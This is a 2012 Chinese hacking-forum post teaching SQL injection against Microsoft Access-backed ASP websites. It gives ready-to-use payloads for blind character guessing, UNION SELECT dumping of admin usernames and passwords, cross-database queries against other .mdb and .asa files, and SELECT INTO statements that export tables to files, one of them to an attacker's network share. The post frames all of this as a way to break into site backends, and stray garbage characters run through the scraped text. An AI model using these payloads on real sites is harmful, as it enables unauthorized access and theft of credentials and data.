找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2064|回复: 0
打印 上一主题 下一主题

Access高级注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:20:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
--------------------------------------------------------------* Q7 q6 e1 i; ]
union查询法, a& [7 |! J& `! f
首先要说的就是查询办法,一般的查询办法就是" _6 {( l- d3 `- c: l
8 K! O. W  W7 E1 z6 p- x" t" k# G
程序代码
6 C3 Z( x% f) Y9 y3 U# Land 1=(select count(*) from admin where left(id,1)='1')
1 s) L4 v: h& m: i2 s; H9 G0 W: N1 U  L! w( L! ]- c9 D
这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
  G2 g. ?6 L. b& ]9 O; q所以这个时候,union select横空出现.别以为只能在PHP里用哦...
) L+ D3 c$ w  Y. t- w1 `譬如你有一个ACCESS点:
- K, v% }2 V& L/ w4 l- E: t程序代码
' u# P, W0 r9 u; Dhttp://bbs.tian6.com/xiaoyang.asp?coder=1: q$ M+ K" b5 I( E* |
, U" U$ u) A5 i* }: V
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),
  I9 Q8 S' L( A0 n$ S/ w  ~; l1 n然后我们直接来:6 w. r6 i/ F3 @  y  g0 A
程序代码2 Q9 V4 a/ Z# }8 p- [
http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]7 f) a4 O# F% [& ^6 v7 x
  O6 B& |% i1 S. s5 p
这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.  c- K. Q: s& C6 t) x. L

, z  G. e( l3 O5 w& I& Y# W) N2 L7 j4 ^
/ @! @3 M* R- `
7 P) ?7 `$ e2 |' x* ]---------------------------------------------------------------
6 A7 J5 S) m8 m5 J0 G- m3 r- YAccess跨库查询  `, ]3 K+ \' ^$ f
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
/ E6 ?- c: A# x跨库的查询语句:% i  d* z% q$ f
子查询:
' P& |3 N' M/ `4 U6 J程序代码
9 J/ p! p- Q7 {7 eand (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
$ ?, k' L0 A0 Z+ ^# H3 X
5 t5 O; i6 n8 |' }8 Gunion查询:
. d8 }! @4 N' m+ Z2 q2 N3 U& F0 q程序代码# \) @8 ^% |- M2 E
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1
3 }! z0 R/ Z( N$ Y! c; t, |1 |0 w9 C
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:
# c3 S5 k! }( D$ \; x程序代码
) T- n: A% g, n7 nhttp://www.4ngel.net/article/46.htm   e5 f/ s" {, k" D5 s8 x% z3 y7 L0 {
http://hf110.com/Article/hack/rqsl/200502/66.html( O0 m8 J$ p1 Z( N2 K5 d

7 b4 J0 @% z1 o8 k---------------------------------------------------------------. K* p" I6 L) p1 {# M6 t: c
Access注入,导出txt,htm,html
3 Z: n* `9 p$ k子查询语句:
: X( o: u4 b! e5 N  t程序代码, u! W% E4 u, ]* l: T
Select * into [test.txt] in 'd:\web\' 'text;' from admin9 @# n3 j  q* t0 T& o+ Q
7 K" ]5 y% r' f! x9 J
这样就把admin表的内容以test类型存进了d:\web里面.  R: A! f. T) _9 }3 n% F
UNION查询:! w$ _: f: O# v% y7 r
程序代码7 r; ]$ w' _% c" o
union select * into [admin.txt] in 'c:\' 'test;' from admin
- J" d$ @0 Y8 n) O
) t5 L2 b- K- T" z7 f而且这里也可以保存到本地来:. y7 w; T6 B0 t
程序代码# W. w4 F  a& |! _  @
Select * into [test.txt] in '\\yourip\share' 'text;' from admin
+ K4 S/ z6 ?' r0 h$ v3 t" F6 v2 l
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
9 S5 K& x! K; ?3 \$ X7 H6 t1 s' Y- O  _* x4 Z
程序代码, B' e  @) X- }! ]: s, @
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
, l* N& _  p4 D
" j0 T* b$ `- q因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.3 @+ R$ [1 i7 i- O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表